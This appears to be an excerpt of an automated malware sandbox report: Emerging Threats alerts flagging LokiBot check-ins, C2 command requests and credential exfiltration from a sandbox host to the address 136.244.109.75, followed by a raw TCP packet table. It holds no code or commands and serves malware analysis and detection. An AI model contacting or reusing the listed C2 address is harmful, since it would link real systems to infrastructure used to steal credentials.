04/17/24-03:17:58.145128	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49756	80	192.168.2.5	136.244.109.75
04/17/24-03:17:37.986053	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.5	136.244.109.75
04/17/24-03:17:48.803719	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.5	136.244.109.75
04/17/24-03:16:50.877994	TCP	2025381	ET TROJAN LokiBot Checkin	49705	80	192.168.2.5	136.244.109.75
04/17/24-03:17:07.139176	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49716	80	192.168.2.5	136.244.109.75
04/17/24-03:17:53.372679	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.5	136.244.109.75
04/17/24-03:17:48.803719	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.5	136.244.109.75
04/17/24-03:16:53.759072	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49707	80	192.168.2.5	136.244.109.75
04/17/24-03:17:50.302449	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.5	136.244.109.75
04/17/24-03:17:41.291392	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.5	136.244.109.75
04/17/24-03:17:24.136611	TCP	2025381	ET TROJAN LokiBot Checkin	49733	80	192.168.2.5	136.244.109.75
04/17/24-03:18:41.923839	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.5	136.244.109.75
04/17/24-03:17:10.136681	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.5	136.244.109.75
04/17/24-03:17:58.145128	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.5	136.244.109.75
04/17/24-03:18:10.084965	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.5	136.244.109.75
04/17/24-03:17:13.162928	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49726	80	192.168.2.5	136.244.109.75
04/17/24-03:18:17.867642	TCP	2025381	ET TROJAN LokiBot Checkin	49770	80	192.168.2.5	136.244.109.75
04/17/24-03:18:38.899573	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.5	136.244.109.75
04/17/24-03:18:38.899573	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49784	80	192.168.2.5	136.244.109.75
04/17/24-03:18:52.381113	TCP	2025381	ET TROJAN LokiBot Checkin	49793	80	192.168.2.5	136.244.109.75
04/17/24-03:17:31.711088	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49738	80	192.168.2.5	136.244.109.75
04/17/24-03:18:13.442138	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.5	136.244.109.75
04/17/24-03:18:20.835118	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.5	136.244.109.75
04/17/24-03:17:20.757055	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.5	136.244.109.75
04/17/24-03:18:01.176692	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.5	136.244.109.75
04/17/24-03:17:31.711088	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49738	80	192.168.2.5	136.244.109.75
04/17/24-03:18:11.616140	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.5	136.244.109.75
04/17/24-03:17:08.603347	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.5	136.244.109.75
04/17/24-03:17:20.757055	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.5	136.244.109.75
04/17/24-03:18:11.616140	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.5	136.244.109.75
04/17/24-03:17:51.797146	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.5	136.244.109.75
04/17/24-03:17:11.695407	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.5	136.244.109.75
04/17/24-03:17:33.230598	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.5	136.244.109.75
04/17/24-03:17:30.128575	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49737	80	192.168.2.5	136.244.109.75
04/17/24-03:17:30.128575	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49737	80	192.168.2.5	136.244.109.75
04/17/24-03:18:53.924913	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49794	80	192.168.2.5	136.244.109.75
04/17/24-03:18:37.366005	TCP	2025381	ET TROJAN LokiBot Checkin	49783	80	192.168.2.5	136.244.109.75
04/17/24-03:18:53.924913	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.5	136.244.109.75
04/17/24-03:18:32.922641	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.5	136.244.109.75
04/17/24-03:18:23.842884	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.5	136.244.109.75
04/17/24-03:18:28.314689	TCP	2025381	ET TROJAN LokiBot Checkin	49777	80	192.168.2.5	136.244.109.75
04/17/24-03:18:35.861538	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.5	136.244.109.75
04/17/24-03:18:40.424546	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.5	136.244.109.75
04/17/24-03:18:44.899678	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49788	80	192.168.2.5	136.244.109.75
04/17/24-03:17:54.967221	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.5	136.244.109.75
04/17/24-03:17:01.257517	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49712	80	192.168.2.5	136.244.109.75
04/17/24-03:17:45.817567	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.5	136.244.109.75
04/17/24-03:18:14.912121	TCP	2025381	ET TROJAN LokiBot Checkin	49768	80	192.168.2.5	136.244.109.75
04/17/24-03:18:49.380266	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.5	136.244.109.75
04/17/24-03:18:26.814059	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49776	80	192.168.2.5	136.244.109.75
04/17/24-03:18:31.393355	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49779	80	192.168.2.5	136.244.109.75
04/17/24-03:17:47.288202	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.5	136.244.109.75
04/17/24-03:17:01.257517	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49712	80	192.168.2.5	136.244.109.75
04/17/24-03:16:56.772780	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49709	80	192.168.2.5	136.244.109.75
04/17/24-03:18:44.899678	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49788	80	192.168.2.5	136.244.109.75
04/17/24-03:18:04.154071	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49760	80	192.168.2.5	136.244.109.75
04/17/24-03:16:56.772780	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49709	80	192.168.2.5	136.244.109.75
04/17/24-03:18:34.395592	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49781	80	192.168.2.5	136.244.109.75
04/17/24-03:17:17.652364	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.5	136.244.109.75
04/17/24-03:18:25.351055	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49775	80	192.168.2.5	136.244.109.75
04/17/24-03:18:05.666467	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.5	136.244.109.75
04/17/24-03:16:52.374211	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49706	80	192.168.2.5	136.244.109.75
04/17/24-03:17:25.655732	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49734	80	192.168.2.5	136.244.109.75
04/17/24-03:16:52.374211	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49706	80	192.168.2.5	136.244.109.75
04/17/24-03:17:34.754471	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.5	136.244.109.75
04/17/24-03:17:34.754471	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.5	136.244.109.75
04/17/24-03:17:56.686682	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.5	136.244.109.75
04/17/24-03:17:27.158635	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.5	136.244.109.75
04/17/24-03:18:34.395592	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49781	80	192.168.2.5	136.244.109.75
04/17/24-03:17:16.164912	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49728	80	192.168.2.5	136.244.109.75
04/17/24-03:17:04.956657	TCP	2025381	ET TROJAN LokiBot Checkin	49714	80	192.168.2.5	136.244.109.75
04/17/24-03:18:16.378463	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.5	136.244.109.75
04/17/24-03:17:36.230211	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.5	136.244.109.75
04/17/24-03:17:59.618244	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.5	136.244.109.75
04/17/24-03:17:25.655732	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49734	80	192.168.2.5	136.244.109.75
04/17/24-03:18:16.378463	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49769	80	192.168.2.5	136.244.109.75
04/17/24-03:18:25.351055	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.5	136.244.109.75
04/17/24-03:17:16.164912	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49728	80	192.168.2.5	136.244.109.75

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 17, 2024 03:16:50.671928883 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:50.875370026 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:50.875492096 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:50.877994061 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:51.081312895 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:51.081429005 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:51.284851074 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016489029 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016509056 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016521931 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016536951 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016551971 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016565084 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016578913 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016592979 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016601086 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.016601086 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.016608000 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016623020 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.016666889 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.016666889 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.016666889 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.016688108 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.168430090 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.219883919 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.219902039 CEST	80	49705	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.220046997 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.220047951 CEST	49705	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.372294903 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.372375965 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.374211073 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.578284025 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:52.578356028 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:52.782258034 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501743078 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501759052 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501770973 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501782894 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501804113 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.501842976 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.501853943 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501866102 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501877069 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501888990 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501899958 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.501900911 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501916885 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.501936913 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.501962900 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.501997948 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.553929090 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.705858946 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.705873013 CEST	80	49706	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.706012011 CEST	49706	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.757080078 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.757159948 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.759072065 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:53.962362051 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:53.962456942 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:54.165700912 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978631020 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978657961 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978676081 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978694916 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978717089 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978729010 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:54.978738070 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978756905 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978775024 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978775024 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:54.978775024 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:54.978792906 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978806019 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:54.978816986 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:54.978821993 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:54.978833914 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:54.978859901 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:55.111939907 CEST	49708	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:55.182153940 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:55.182173014 CEST	80	49707	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:55.182204962 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:55.182233095 CEST	49707	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:55.315145016 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:55.315280914 CEST	49708	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:55.317147970 CEST	49708	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:55.520354986 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:55.520426035 CEST	49708	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:55.723548889 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425553083 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425570011 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425580978 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425592899 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425604105 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425616026 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425627947 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425638914 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425652027 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425663948 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.425815105 CEST	49708	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:56.425816059 CEST	49708	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:56.425919056 CEST	49708	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:56.563469887 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:56.629436016 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.629451036 CEST	80	49708	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.629667044 CEST	49708	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:56.770906925 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.770998955 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:56.772779942 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:56.980127096 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:56.980240107 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:57.187807083 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881382942 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881400108 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881409883 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881419897 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881434917 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881445885 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881458044 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881469965 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881483078 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881496906 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:57.881496906 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:57.881567001 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:57.881659031 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:58.030112028 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:58.089013100 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:58.089027882 CEST	80	49709	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:58.089083910 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:58.089116096 CEST	49709	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:58.234025002 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:58.234265089 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:58.235959053 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:58.439713001 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:58.440047979 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:58.643835068 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342629910 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342648029 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342659950 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342686892 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342700005 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342713118 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342725992 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342741013 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.342782021 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342794895 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342804909 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.342812061 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.342828035 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.342865944 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.343352079 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.499667883 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.546618938 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.546634912 CEST	80	49710	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.546834946 CEST	49710	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.707048893 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.707150936 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.708946943 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:16:59.916194916 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:16:59.916275024 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:00.123641014 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.888947010 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.888991117 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889027119 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889061928 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889098883 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889137983 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889229059 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889257908 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:00.889257908 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:00.889266014 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889303923 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889316082 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:00.889342070 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:00.889388084 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:00.889403105 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:01.046714067 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:01.096741915 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:01.096782923 CEST	80	49711	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:01.096888065 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:01.096888065 CEST	49711	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:01.254400969 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:01.254596949 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:01.257517099 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:01.465795994 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:01.465902090 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:01.673502922 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374149084 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374207973 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374247074 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374279976 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.374284029 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374322891 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374337912 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.374361992 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374408960 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.374417067 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374433994 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.374454975 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374475956 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.374490976 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374510050 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.374531984 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.374542952 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.374577999 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.582324982 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.582391024 CEST	80	49712	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.582427979 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.582463026 CEST	49712	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.773025990 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.981182098 CEST	80	49713	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:02.981518030 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:02.984312057 CEST	49713	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:03.192332029 CEST	80	49713	136.244.109.75	192.168.2.5
